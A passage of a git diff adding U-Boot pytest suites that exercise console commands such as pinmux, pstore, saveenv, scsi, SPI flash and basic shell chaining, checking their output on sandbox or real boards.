b/test/py/tests/test_pinmux.py @@ -0,0 +1,85 @@ +# SPDX-License-Identifier: GPL-2.0 + +import pytest +import u_boot_utils + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_1(u_boot_console): + """Test that 'pinmux' command without parameters displays + pinmux usage.""" + output = u_boot_console.run_command('pinmux') + assert 'Usage:' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_2(u_boot_console): + """Test that 'pinmux status' executed without previous "pinmux dev" + command displays error message.""" + output = u_boot_console.run_command('pinmux status') + assert 'pin-controller device not selected' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status_all(u_boot_console): + """Test that 'pinmux status -a' displays pin's muxing.""" + output = u_boot_console.run_command('pinmux status -a') + + assert ('pinctrl-gpio:' in output) + assert ('a5 : gpio output .' in output) + assert ('a6 : gpio output .' in output) + + assert ('pinctrl:' in output) + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_list(u_boot_console): + """Test that 'pinmux list' returns the pin-controller list.""" + output = u_boot_console.run_command('pinmux list') + assert 'sandbox_pinctrl' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_dev_bad(u_boot_console): + """Test that 'pinmux dev' returns an error when trying to select a + wrong pin controller.""" + pincontroller = 'bad_pin_controller_name' + output = u_boot_console.run_command('pinmux dev ' + pincontroller) + expected_output = 'Can\'t get the pin-controller: ' + pincontroller + '!' + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_dev(u_boot_console): + """Test that 'pinmux dev' select the wanted pin controller.""" + pincontroller = 'pinctrl' + output = u_boot_console.run_command('pinmux dev ' + pincontroller) + expected_output = 'dev: ' + pincontroller + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status(u_boot_console): + """Test that 'pinmux status' displays selected pincontroller's pin + muxing descriptions.""" + u_boot_console.run_command('pinmux dev pinctrl') + output = u_boot_console.run_command('pinmux status') + + assert (not 'pinctrl-gpio:' in output) + assert (not 'pinctrl:' in output) + + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) diff --git a/test/py/tests/test_pstore.py b/test/py/tests/test_pstore.py new file mode 100644 index 00000000000..5a35724f60a --- /dev/null +++ b/test/py/tests/test_pstore.py @@ -0,0 +1,77 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Collabora +# Author: Frédéric Danis <frederic.danis@collabora.com> + +import pytest +import u_boot_utils +import os +import tempfile +import shutil + +PSTORE_ADDR=0x3000000 +PSTORE_LENGTH=0x100000 +PSTORE_PANIC1='test/py/tests/test_pstore_data_panic1.hex' +PSTORE_PANIC2='test/py/tests/test_pstore_data_panic2.hex' +PSTORE_CONSOLE='test/py/tests/test_pstore_data_console.hex' +ADDR=0x01000008 + +def load_pstore(u_boot_console): + """Load PStore records from sample files""" + + output = u_boot_console.run_command_list([ + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR, + os.path.join(u_boot_console.config.source_dir, PSTORE_PANIC1)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 4096, + os.path.join(u_boot_console.config.source_dir, PSTORE_PANIC2)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 253 * 4096, + os.path.join(u_boot_console.config.source_dir, PSTORE_CONSOLE)), + 'pstore set 0x%x 0x%x' % (PSTORE_ADDR, PSTORE_LENGTH)]) + +def checkfile(u_boot_console, path, filesize, checksum): + """Check file against MD5 checksum""" + + output = u_boot_console.run_command_list([ + 'load hostfs - %x %s' % (ADDR, path), + 'printenv filesize']) + assert('filesize=%x' % (filesize) in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(checksum in ''.join(output)) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_all_records(u_boot_console): + """Test that pstore displays all records.""" + + u_boot_console.run_command('') + load_pstore(u_boot_console) + response = u_boot_console.run_command('pstore display') + assert('**** Dump' in response) + assert('**** Console' in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_one_record(u_boot_console): + """Test that pstore displays only one record.""" + + u_boot_console.run_command('') + load_pstore(u_boot_console) + response = u_boot_console.run_command('pstore display dump 1') + assert('Panic#2 Part1' in response) + assert('**** Console' not in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_save_records(u_boot_console): + """Test that pstore saves all records.""" + + outdir = tempfile.mkdtemp() + + u_boot_console.run_command('') + load_pstore(u_boot_console) + u_boot_console.run_command('pstore save hostfs - %s' % (outdir)) + + checkfile(u_boot_console, '%s/dmesg-ramoops-0' % (outdir), 3798, '8059335ab4cfa62c77324c491659c503') + checkfile(u_boot_console, '%s/dmesg-ramoops-1' % (outdir), 4035, '3ff30df3429d81939c75d0070b5187b9') + checkfile(u_boot_console, '%s/console-ramoops-0' % (outdir), 4084, 'bb44de4a9b8ebd9b17ae98003287325b') + + shutil.rmtree(outdir) diff --git a/test/py/tests/test_pstore_data_console.hex b/test/py/tests/test_pstore_data_console.hex Binary files differnew file mode 100644 index 00000000000..e7f426e8928 --- /dev/null +++ b/test/py/tests/test_pstore_data_console.hex diff --git a/test/py/tests/test_pstore_data_panic1.hex b/test/py/tests/test_pstore_data_panic1.hex Binary files differnew file mode 100644 index 00000000000..988929d12c2 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic1.hex diff --git a/test/py/tests/test_pstore_data_panic2.hex b/test/py/tests/test_pstore_data_panic2.hex Binary files differnew file mode 100644 index 00000000000..8f9d56cbe01 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic2.hex diff --git a/test/py/tests/test_qfw.py b/test/py/tests/test_qfw.py new file mode 100644 index 00000000000..8b668c9721a --- /dev/null +++ b/test/py/tests/test_qfw.py @@ -0,0 +1,26 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Asherah Connor <ashe@kivikakk.ee> + +# Test qfw command implementation + +import pytest + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_cpus(u_boot_console): + "Test QEMU firmware config reports the CPU count." + + output = u_boot_console.run_command('qfw cpus') + # The actual number varies depending on the board under test, so only + # assert a non-zero output. + assert 'cpu(s) online' in output + assert '0 cpu(s) online' not in output + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_list(u_boot_console): + "Test QEMU firmware config lists devices." + + output = u_boot_console.run_command('qfw list') + # Assert either: + # 1) 'test-one', from the sandbox driver, or + # 2) 'bootorder', found in every real QEMU implementation. + assert ("bootorder" in output) or ("test-one" in output) diff --git a/test/py/tests/test_reset.py b/test/py/tests/test_reset.py new file mode 100644 index 00000000000..00fc31da57d --- /dev/null +++ b/test/py/tests/test_reset.py @@ -0,0 +1,63 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__reset_test_skip to True if reset test is not possible or desired +# and should be skipped. +env__reset_test_skip = True + +# Setup env__reset_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__reset_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import test_000_version + +def setup_reset_env(u_boot_console): + if u_boot_console.config.env.get('env__reset_test_skip', False): + pytest.skip('reset test is not enabled') + + output = u_boot_console.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = u_boot_console.config.env.get('env__reset_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping reset test due to jtag bootmode') + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset(u_boot_console): + """Test the reset command in non-JTAG bootmode. + It does COLD reset, which resets CPU, DDR and peripherals + """ + setup_reset_env(u_boot_console) + u_boot_console.run_command('reset', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(u_boot_console) + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset_w(u_boot_console): + """Test the reset -w command in non-JTAG bootmode. + It does WARM reset, which resets CPU but keep DDR/peripherals active. + """ + setup_reset_env(u_boot_console) + u_boot_console.run_command('reset -w', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(u_boot_console) diff --git a/test/py/tests/test_sandbox_exit.py b/test/py/tests/test_sandbox_exit.py new file mode 100644 index 00000000000..706f5fa3594 --- /dev/null +++ b/test/py/tests/test_sandbox_exit.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import signal + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('sysreset_cmd_poweroff') +def test_poweroff(u_boot_console): + """Test that the "poweroff" command exits sandbox process.""" + + u_boot_console.run_command('poweroff', wait_for_prompt=False) + assert(u_boot_console.validate_exited()) + +@pytest.mark.boardspec('sandbox') +def test_ctrl_c(u_boot_console): + """Test that sending SIGINT to sandbox causes it to exit.""" + + u_boot_console.kill(signal.SIGINT) + assert(u_boot_console.validate_exited()) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.buildconfigspec('sandbox_crash_reset') +def test_exception_reset(u_boot_console): + """Test that SIGILL causes a reset.""" + + u_boot_console.run_command('exception undefined', wait_for_prompt=False) + m = u_boot_console.p.expect(['resetting ...', 'U-Boot']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + m = u_boot_console.p.expect(['U-Boot', '=>']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + u_boot_console.restart_uboot() + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.notbuildconfigspec('sandbox_crash_reset') +def test_exception_exit(u_boot_console): + """Test that SIGILL causes a reset.""" + + u_boot_console.run_command('exception undefined', wait_for_prompt=False) + assert(u_boot_console.validate_exited()) diff --git a/test/py/tests/test_sandbox_opts.py b/test/py/tests/test_sandbox_opts.py new file mode 100644 index 00000000000..422b43cb3bc --- /dev/null +++ b/test/py/tests/test_sandbox_opts.py @@ -0,0 +1,30 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_cmdline' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_cmdline(u_boot_console): + """Test building sandbox without CONFIG_CMDLINE""" + cons = u_boot_console + + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~CMDLINE', '-o', TMPDIR]) + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_lto(u_boot_console): + """Test building sandbox without CONFIG_LTO""" + cons = u_boot_console + + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~LTO', '-o', TMPDIR]) diff --git a/test/py/tests/test_saveenv.py b/test/py/tests/test_saveenv.py new file mode 100644 index 00000000000..7faa3bdf93d --- /dev/null +++ b/test/py/tests/test_saveenv.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__saveenv_test_skip to True if saveenv test is not possible or +# desired and should be skipped. +env__saveenv_test_skip = True + +# Setup env__saveenv_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__saveenv_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import random +import ipaddress +import string +import uuid + +# Setup the env +def setup_saveenv_env(u_boot_console): + if u_boot_console.config.env.get('env__saveenv_test_skip', False): + pytest.skip('saveenv test is not enabled') + + output = u_boot_console.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = u_boot_console.config.env.get('env__saveenv_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping saveenv test due to jtag bootmode') + +# Check return code +def ret_code(u_boot_console): + return u_boot_console.run_command('echo $?') + +# Verify env variable +def check_env(u_boot_console, var_name, var_value): + if var_value: + output = u_boot_console.run_command(f'printenv {var_name}') + var_value = str(var_value) + if (var_value.startswith("'") and var_value.endswith("'")) or ( + var_value.startswith('"') and var_value.endswith('"') + ): + var_value = var_value.split(var_value[-1])[1] + assert var_value in output + assert ret_code(u_boot_console).endswith('0') + else: + u_boot_console.p.send(f'printenv {var_name}\n') + output = u_boot_console.p.expect(['not defined']) + assert output == 0 + assert ret_code(u_boot_console).endswith('1') + +# Set env variable +def set_env(u_boot_console, var_name, var_value): + u_boot_console.run_command(f'setenv {var_name} {var_value}') + assert ret_code(u_boot_console).endswith('0') + check_env(u_boot_console, var_name, var_value) + +@pytest.mark.buildconfigspec('cmd_saveenv') +@pytest.mark.buildconfigspec('hush_parser') +def test_saveenv(u_boot_console): + """Test the saveenv command in non-JTAG bootmode. + It saves the U-Boot environment in persistent storage. + """ + setup_saveenv_env(u_boot_console) + + # Set env for random mac address + rand_mac = '%02x:%02x:%02x:%02x:%02x:%02x' % ( + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + ) + set_env(u_boot_console, 'mac_addr', rand_mac) + + # Set env for random IPv4 address + rand_ipv4 = ipaddress.IPv4Address._string_from_ip_int( + random.randint(0, ipaddress.IPv4Address._ALL_ONES) + ) + set_env(u_boot_console, 'ipv4_addr', rand_ipv4) + + # Set env for random IPv6 address + rand_ipv6 = ipaddress.IPv6Address._string_from_ip_int( + random.randint(0, ipaddress.IPv6Address._ALL_ONES) + ) + set_env(u_boot_console, 'ipv6_addr', rand_ipv6) + + # Set env for random number + rand_num = random.randrange(1, 10**9) + set_env(u_boot_console, 'num_var', rand_num) + + # Set env for uuid + uuid_str = uuid.uuid4().hex.lower() + set_env(u_boot_console, 'uuid_var', uuid_str) + + # Set env for random string including special characters + sc = "!#%&()*+,-./:;<=>?@[\\]^_`{|}~" + rand_str = ''.join( + random.choices(' ' + string.ascii_letters + sc + string.digits, k=300) + ) + set_env(u_boot_console, 'str_var', f'"{rand_str}"') + + # Set env for empty string + set_env(u_boot_console, 'empty_var', '') + + # Save the env variables + u_boot_console.run_command('saveenv') + assert ret_code(u_boot_console).endswith('0') + + # Reboot + u_boot_console.run_command('reset', wait_for_reboot=True) + + # Verify the saved env variables + check_env(u_boot_console, 'mac_addr', rand_mac) + check_env(u_boot_console, 'ipv4_addr', rand_ipv4) + check_env(u_boot_console, 'ipv6_addr', rand_ipv6) + check_env(u_boot_console, 'num_var', rand_num) + check_env(u_boot_console, 'uuid_var', uuid_str) + check_env(u_boot_console, 'str_var', rand_str) + check_env(u_boot_console, 'empty_var', '') diff --git a/test/py/tests/test_scp03.py b/test/py/tests/test_scp03.py new file mode 100644 index 00000000000..1a104b365f7 --- /dev/null +++ b/test/py/tests/test_scp03.py @@ -0,0 +1,27 @@ +# Copyright (c) 2021 Foundries.io Ltd +# +# SPDX-License-Identifier: GPL-2.0+ +# +# SCP03 command test + +""" +This tests SCP03 command in U-Boot. + +For additional details check doc/usage/scp03.rst +""" + +import pytest +import u_boot_utils as util + +@pytest.mark.buildconfigspec('cmd_scp03') +def test_scp03(u_boot_console): + """Enable and provision keys with SCP03 + """ + + success_str1 = "SCP03 is enabled" + success_str2 = "SCP03 is provisioned" + + response = u_boot_console.run_command('scp03 enable') + assert success_str1 in response + response = u_boot_console.run_command('scp03 provision') + assert success_str2 in response diff --git a/test/py/tests/test_scsi.py b/test/py/tests/test_scsi.py new file mode 100644 index 00000000000..be2e283e7d2 --- /dev/null +++ b/test/py/tests/test_scsi.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the SCSI device number, type and capacity. This test will be automatically +skipped without this. + +For example: + +# Setup env__scsi_device_test to set the SCSI device number/slot, the type of +device, and the device capacity in MB. +env__scsi_device_test = { + 'dev_num': 0, + 'device_type': 'Hard Disk', + 'device_capacity': '476940.0 MB', +} +""" + +def scsi_setup(u_boot_console): + f = u_boot_console.config.env.get('env__scsi_device_test', None) + if not f: + pytest.skip('No SCSI device to test') + + dev_num = f.get('dev_num', None) + if not isinstance(dev_num, int): + pytest.skip('No device number specified in env file to read') + + dev_type = f.get('device_type') + if not dev_type: + pytest.skip('No device type specified in env file to read') + + dev_size = f.get('device_capacity') + if not dev_size: + pytest.skip('No device capacity specified in env file to read') + + return dev_num, dev_type, dev_size + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_reset(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi reset') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_info(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi info') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_scan(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi scan') + assert f'Device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_dev(u_boot_console): + dev_num, dev_type, dev_size = scsi_setup(u_boot_console) + output = u_boot_console.run_command('scsi device') + assert 'no scsi devices available' not in output + assert f'device {dev_num}:' in output + assert f'Type: {dev_type}' in output + assert f'Capacity: {dev_size}' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + output = u_boot_console.run_command('scsi device %d' % dev_num) + assert 'is now current device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_scsi') +def test_scsi_part(u_boot_console): + test_scsi_dev(u_boot_console) + output = u_boot_console.run_command('scsi part') + assert 'Partition Map for SCSI device' in output + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_semihosting/conftest.py b/test/py/tests/test_semihosting/conftest.py new file mode 100644 index 00000000000..b00d8f4ea9c --- /dev/null +++ b/test/py/tests/test_semihosting/conftest.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0-or-later + +"""Fixture for semihosting command test +""" + +import os +import pytest + +@pytest.fixture(scope='session') +def semihosting_data(u_boot_config): + """Set up a file system to be used in semihosting tests + + Args: + u_boot_config -- U-Boot configuration. + """ + image_path = u_boot_config.persistent_data_dir + '/semihosting.txt' + + with open(image_path, 'w', encoding = 'utf-8') as file: + file.write('Das U-Boot\n') + + yield image_path + + os.remove(image_path) diff --git a/test/py/tests/test_semihosting/test_hostfs.py b/test/py/tests/test_semihosting/test_hostfs.py new file mode 100644 index 00000000000..51f6fa7702c --- /dev/null +++ b/test/py/tests/test_semihosting/test_hostfs.py @@ -0,0 +1,33 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for semihosting +""" + +import pytest + +@pytest.mark.buildconfigspec('semihosting') +def test_semihosting_hostfs(u_boot_console, semihosting_data): + """ Unit test for semihosting + + Args: + u_boot_console -- U-Boot console + semihosting_data -- Path to the disk image used for testing. + """ + response = u_boot_console.run_command( + f'load hostfs - $loadaddr {semihosting_data}') + assert '11 bytes read' in response + + response = u_boot_console.run_command( + 'crc32 $loadaddr $filesize') + assert '==> 60cfccfc' in response + + u_boot_console.run_command( + f'save hostfs - $loadaddr {semihosting_data} 11 11') + + response = u_boot_console.run_command( + f'load hostfs - $loadaddr {semihosting_data} 4 13') + assert '4 bytes read' in response + + response = u_boot_console.run_command( + 'crc32 $loadaddr $filesize') + assert '==> e29063ea' in response diff --git a/test/py/tests/test_sf.py b/test/py/tests/test_sf.py new file mode 100644 index 00000000000..adf8b7dc893 --- /dev/null +++ b/test/py/tests/test_sf.py @@ -0,0 +1,217 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, Xilinx Inc. Michal Simek +# Copyright (c) 2017, Xiphos Systems Corp. All rights reserved. + +import re +import pytest +import random +import u_boot_utils + +""" +Note: This test relies on boardenv_* containing configuration values to define +which SPI Flash areas are available for testing. Without this, this test will +be automatically skipped. +For example: + +# A list of sections of Flash memory to be tested. +env__sf_configs = ( + { + # Where in SPI Flash should the test operate. + 'offset': 0x00000000, + # This value is optional. + # If present, specifies the [[bus:]cs] argument used in `sf probe` + # If missing, defaults to 0. + 'id': '0:1', + # This value is optional. + # If set as a number, specifies the speed of the SPI Flash. + # If set as an array of 2, specifies a range for a random speed. + # If missing, defaults to 0. + 'speed': 1000000, + # This value is optional. + # If present, specifies the size to use for read/write operations. + # If missing, the SPI Flash page size is used as a default (based on + # the `sf probe` output). + 'len': 0x10000, + # This value is optional. + # If present, specifies if the test can write to Flash offset + # If missing, defaults to False. + 'writeable': False, + # This value is optional. + # If present, specifies the expected CRC32 value of the flash area. + # If missing, extra check is ignored. + 'crc32': 0xCAFECAFE, + }, +) +""" + +def sf_prepare(u_boot_console, env__sf_config): + """Check global state of the SPI Flash before running any test. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + sf_params: a dictionary of SPI Flash parameters. + """ + + sf_params = {} + sf_params['ram_base'] = u_boot_utils.find_ram_base(u_boot_console) + + probe_id = env__sf_config.get('id', 0) + speed = env__sf_config.get('speed', 0) + if isinstance(speed, int): + sf_params['speed'] = speed + else: + assert len(speed) == 2, "If speed is a list, it must have 2 entries" + sf_params['speed'] = random.randint(speed[0], speed[1]) + + cmd = 'sf probe %d %d' % (probe_id, sf_params['speed']) + + output = u_boot_console.run_command(cmd) + assert 'SF: Detected' in output, 'No Flash device available' + + m = re.search('page size (.+?) Bytes', output) + assert m, 'SPI Flash page size not recognized' + sf_params['page_size'] = int(m.group(1)) + + m = re.search('erase size (.+?) KiB', output) + assert m, 'SPI Flash erase size not recognized' + sf_params['erase_size'] = int(m.group(1)) + sf_params['erase_size'] *= 1024 + + m = re.search('total (.+?) MiB', output) + assert m, 'SPI Flash total size not recognized' + sf_params['total_size'] = int(m.group(1)) + sf_params['total_size'] *= 1024 * 1024 + + assert 'offset' in env__sf_config, \ + '\'offset\' is required for this test.' + sf_params['len'] = env__sf_config.get('len', sf_params['erase_size']) + + assert not env__sf_config['offset'] % sf_params['erase_size'], \ + 'offset not multiple of erase size.' + assert not sf_params['len'] % sf_params['erase_size'], \ + 'erase length not multiple of erase size.' + + assert not (env__sf_config.get('writeable', False) and + 'crc32' in env__sf_config), \ + 'Cannot check crc32 on writeable sections' + + return sf_params + +def sf_read(u_boot_console, env__sf_config, sf_params): + """Helper function used to read and compute the CRC32 value of a section of + SPI Flash memory. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + sf_params: SPI Flash parameters. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = random.randint(0, 0xFF) + crc_expected = env__sf_config.get('crc32', None) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + u_boot_console.run_command(cmd) + crc_pattern = u_boot_utils.crc32(u_boot_console, addr, count) + if crc_expected: + assert crc_pattern != crc_expected + + cmd = 'sf read %08x %08x %x' % (addr, offset, count) + response = u_boot_console.run_command(cmd) + assert 'Read: OK' in response, 'Read operation failed' + crc_readback = u_boot_utils.crc32(u_boot_console, addr, count) + assert crc_pattern != crc_readback, 'sf read did not update RAM content.' + if crc_expected: + assert crc_readback == crc_expected + + return crc_readback + +def sf_update(u_boot_console, env__sf_config, sf_params): + """Helper function used to update a section of SPI Flash memory. + + Args: + u_boot_console: A U-Boot console connection. + env__sf_config: The single SPI Flash device configuration on which to + run the tests. + + Returns: + CRC32 value of SPI Flash section + """ + + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + pattern = int(random.random() * 0xFF) + + cmd = 'mw.b %08x %02x %x' % (addr, pattern, count) + u_boot_console.run_command(cmd) + crc_pattern = u_boot_utils.crc32(u_boot_console, addr, count) + + cmd = 'sf update %08x %08x %x' % (addr, offset, count) + u_boot_console.run_command(cmd) + crc_readback = sf_read(u_boot_console, env__sf_config, sf_params) + + assert crc_readback == crc_pattern + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read(u_boot_console, env__sf_config): + sf_params = sf_prepare(u_boot_console, env__sf_config) + sf_read(u_boot_console, env__sf_config, sf_params) + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_read_twice(u_boot_console, env__sf_config): + sf_params = sf_prepare(u_boot_console, env__sf_config) + + crc1 = sf_read(u_boot_console, env__sf_config, sf_params) + sf_params['ram_base'] += 0x100 + crc2 = sf_read(u_boot_console, env__sf_config, sf_params) + + assert crc1 == crc2, 'CRC32 of two successive read operation do not match' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_erase(u_boot_console, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(u_boot_console, env__sf_config) + addr = sf_params['ram_base'] + offset = env__sf_config['offset'] + count = sf_params['len'] + + cmd = 'sf erase %08x %x' % (offset, count) + output = u_boot_console.run_command(cmd) + assert 'Erased: OK' in output, 'Erase operation failed' + + cmd = 'mw.b %08x ff %x' % (addr, count) + u_boot_console.run_command(cmd) + crc_ffs = u_boot_utils.crc32(u_boot_console, addr, count) + + crc_read = sf_read(u_boot_console, env__sf_config, sf_params) + assert crc_ffs == crc_read, 'Unexpected CRC32 after erase operation.' + +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.buildconfigspec('cmd_crc32') +@pytest.mark.buildconfigspec('cmd_memory') +def test_sf_update(u_boot_console, env__sf_config): + if not env__sf_config.get('writeable', False): + pytest.skip('Flash config is tagged as not writeable') + + sf_params = sf_prepare(u_boot_console, env__sf_config) + sf_update(u_boot_console, env__sf_config, sf_params) diff --git a/test/py/tests/test_shell_basics.py b/test/py/tests/test_shell_basics.py new file mode 100644 index 00000000000..68a3f892f6b --- /dev/null +++ b/test/py/tests/test_shell_basics.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +# Test basic shell functionality, such as commands separate by semi-colons. + +import pytest + +pytestmark = pytest.mark.buildconfigspec('cmd_echo') + +def test_shell_execute(u_boot_console): + """Test any shell command.""" + + response = u_boot_console.run_command('echo hello') + assert response.strip() == 'hello' + +def test_shell_semicolon_two(u_boot_console): + """Test two shell commands separate by a semi-colon.""" + + cmd = 'echo hello; echo world' + response = u_boot_console.run_command(cmd) + # This validation method ignores the exact whitespace between the strings + assert response.index('hello') < response.index('world') + +def test_shell_semicolon_three(u_boot_console): + """Test three shell commands separate by a semi-colon, with variable + expansion dependencies between them.""" + + cmd = 'setenv list 1; setenv list ${list}2; setenv list ${list}3; ' + \ + 'echo ${list}' + response = u_boot_console.run_command(cmd) + assert response.strip() == '123' + u_boot_console.run_command('setenv list') + +def test_shell_run(u_boot_console): + """Test the "run" shell command.""" + + u_boot_console.run_command('setenv foo \'setenv monty 1; setenv python 2\'') + u_boot_console.run_command('run foo') + response = u_boot_console.run_command('echo ${monty}') + assert response.strip() == '1' + response = u_boot_console.run_command('echo ${python}') + assert response.strip() == '2' + u_boot_console.run_command('setenv foo') + u_boot_console.run_command('setenv monty') + u_boot_console.run_command('setenv python') diff --git 